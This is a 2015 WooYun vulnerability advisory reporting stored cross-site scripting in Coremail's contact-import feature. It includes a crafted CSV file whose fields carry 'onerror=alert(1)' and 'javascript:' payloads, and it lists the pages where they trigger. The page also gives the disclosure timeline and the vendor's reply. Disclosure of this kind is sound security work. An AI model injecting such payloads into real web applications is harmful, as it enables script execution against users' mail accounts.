当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090279

漏洞标题:Coremail某功能多处存储型XSS

相关厂商:Coremail盈世信息科技(北京)有限公司

漏洞作者: phith0n

提交时间:2015-01-06 17:03

修复时间:2015-04-06 17:04

公开时间:2015-04-06 17:04

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-06: 细节已通知厂商并且等待厂商处理中
2015-01-06: 厂商已经确认,细节仅向厂商公开
2015-01-09: 细节向第三方安全合作伙伴开放
2015-03-02: 细节向核心白帽子及相关领域专家公开
2015-03-12: 细节向普通白帽子公开
2015-03-22: 细节向实习白帽子公开
2015-04-06: 细节向公众公开

简要描述:

漏洞还是得交乌云。

详细说明:

coremail在个人通讯录处可以导入联系人,格式为csv。

01.jpg


导入如下CSV:

联系组,姓名,电子邮件地址,住宅地址,住宅地址 邮政编码,住宅电话,移动电话,单位,商务地址,商务地址 邮政编码,商务电话,商务传真,生日,即时信息地址,网页,__cm_group
aa</textarea><img src=1 onerror=alert(1)>aaaaa,</textarea><img src=1 onerror=alert(1)>,</textarea><img src=1 onerror=alert(1)>@qq.com,,,,13132132132,<img src=1 onerror=alert(1)>,<img src=1 onerror=alert(1)>,,<img src=1 onerror=alert(1)>,,19881212,<img src=1 onerror=alert(1)>,javascript:alert(1)
,,,,,,,,,,,,,,,FRIENDS=<img src=1 onerror=alert(1)>
,,,,,,,,,,,,,,,FAMILY=<img src=1 onerror=alert(1)>
,,,,,,,,,,,,,,,COWORKERS=<img src=1 onerror=alert(1)>
,,,,,,,,,,,,,,,NETFRIENDS=网友
,,,,,,,,,,,,,,,VIP=重要联系人


可见主页面已经转义了,没有触发:

02.jpg


但各个功能页面都存在触发的问题,列举如下:
1.新建联系组时触发:

08.jpg


03.jpg


2.打印联系人时触发:

04.jpg


05.jpg


3.编辑组时触发:

06.jpg


07.jpg


4.清空联系人邮件时触发:

09.jpg


10.jpg

漏洞证明:

见详细说明。

修复方案:

dom操作该过滤的过滤。

版权声明:转载请注明来源 phith0n@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-01-06 17:36

厂商回复:

谢谢提交,该问题在实际应用中发生的可能性不大,另在新版中已修复。

最新状态:

暂无